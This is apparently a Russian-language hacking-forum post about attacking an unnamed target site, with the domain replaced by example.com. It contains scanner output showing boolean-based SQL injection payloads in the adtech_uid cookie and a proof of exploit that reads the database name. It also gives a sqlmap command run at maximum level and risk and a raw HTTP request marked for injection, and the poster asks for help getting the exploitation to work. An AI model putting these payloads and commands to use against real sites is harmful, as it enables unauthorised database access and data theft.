Тоже стало интересно по этому таргету, на какой-то поке из предоставленных тобою и окунем выдало баннер с ошибкой sql, при повторных тестах не появлялось большеОкунь выдает такую информацию:
Код:Cookie input adtech_uid was set to ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2 Tests performed: ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*8 AND "000IGL2"="000IGL2 => TRUE ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*9 AND "000IGL2"="000IGL2 => FALSE ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3<(2*4) AND "000IGL2"="000IGL2 => FALSE ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2>(1*5) AND "000IGL2"="000IGL2 => TRUE ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2*0>=0 AND "000IGL2"="000IGL2 => TRUE ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2 => FALSE Original value: ca993490-2349-42e3-ab4b-01347d29e9b4:example.com Proof of Exploit SQL query - SELECT current_database() fo
Так полагаю это не фолс детект, если он смог получить имя базы? Но мапой ни в какую не раскручивается, команда мапы:
Запрос, который скармливаю:Код:sqlmap.py -r 12313.txt -p 'adtech_uid' --level 5 --risk 3 --random-agent
Код:GET https://example.com/vrgames/simulate/ HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Cookie: adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*; top100_id=t1.7155260.657845929.1682017967908; last_visit=1682012294503::1682023094503; _nTab_main=1; _nAccordeonOpened=29; t3_sid_7155260=s1.1111065334.1682017967912.1682023168426.1.21613; jsc=694722c6068a21c9763cec723b70b906 X-Requested-With: XMLHttpRequest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: example.com Connection: Keep-alive
Пробовал ставить разные тамперы, но все равно никак не получается раскрутить.